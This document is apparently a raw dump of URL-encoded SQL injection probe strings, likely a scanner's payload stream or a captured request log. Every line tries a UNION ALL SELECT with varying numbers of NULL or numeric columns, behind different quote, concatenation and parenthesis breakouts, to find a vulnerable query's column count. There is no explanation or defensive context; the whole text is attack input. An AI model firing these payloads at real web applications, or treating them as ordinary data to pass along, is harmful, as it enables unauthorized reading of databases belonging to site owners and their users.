1%22%20WHERE%202281%3D2281%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%205534%3D5534%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%209455%3D9455%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20WHERE%203730%3D3730%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27SeiM%27%20FROM%20DUAL%20WHERE%201771%3D1771%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27CTCw%27%20FROM%20DUAL%20WHERE%207676%3D7676%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27kjac%27%20FROM%20DUAL%20WHERE%206383%3D6383%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27XNCO%27%20FROM%20DUAL%20WHERE%201113%3D1113%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27imEM%27%20FROM%20DUAL%20WHERE%207822%3D7822%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27BoAR%27%20FROM%20DUAL%20WHERE%202250%3D2250%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27qdvm%27%20FROM%20DUAL%20WHERE%206261%3D6261%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27pdLp%27%20FROM%20DUAL%20WHERE%201491%3D1491%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27uofq%27%20FROM%20DUAL%20WHERE%201896%3D1896%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27fINT%27%20FROM%20DUAL%20WHERE%208849%3D8849%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27PTGF%27%20WHERE%204509%3D4509%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27eSoo%27%20WHERE%209968%3D9968%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27SVZL%27%20WHERE%202600%3D2600%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27wAkt%27%20WHERE%209139%3D9139%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27ccHj%27%20WHERE%206757%3D6757%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27Kamn%27%20WHERE%203610%3D3610%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27oSbk%27%20WHERE%209109%3D9109%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27oNBo%27%20WHERE%203950%3D3950%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27mGOV%27%20WHERE%207479%3D7479%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27lmwA%27%20WHERE%202315%3D2315%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20epnJ%20WHERE%202842%3D2842%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20jhLe%20WHERE%207578%3D7578%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20rzPJ%20WHERE%203785%3D3785%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20SGqX%20WHERE%201279%3D1279%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20Dvlv%20WHERE%202229%3D2229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20GgkY%20WHERE%205490%3D5490%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20dYEi%20WHERE%203112%3D3112%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20CMRT%20WHERE%209365%3D9365%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20cLvD%20WHERE%201539%3D1539%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20HLbb%20WHERE%202536%3D2536%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27LIhu%27%20WHERE%204988%3D4988%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27yrPA%27%20WHERE%209110%3D9110%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27bFea%27%20WHERE%201463%3D1463%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27dmls%27%20WHERE%203326%3D3326%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27LQPH%27%20WHERE%201810%3D1810%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27nPpq%27%20WHERE%201572%3D1572%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27XJuM%27%20WHERE%208743%3D8743%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27fxOd%27%20WHERE%208388%3D8388%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27RtGI%27%20WHERE%202458%3D2458%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27lIGa%27%20WHERE%208612%3D8612%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 -3167%29%20UNION%20ALL%20SELECT%204838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838%2C4838--%20 -5066%29%20UNION%20ALL%20SELECT%208866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866%2C8866--%20 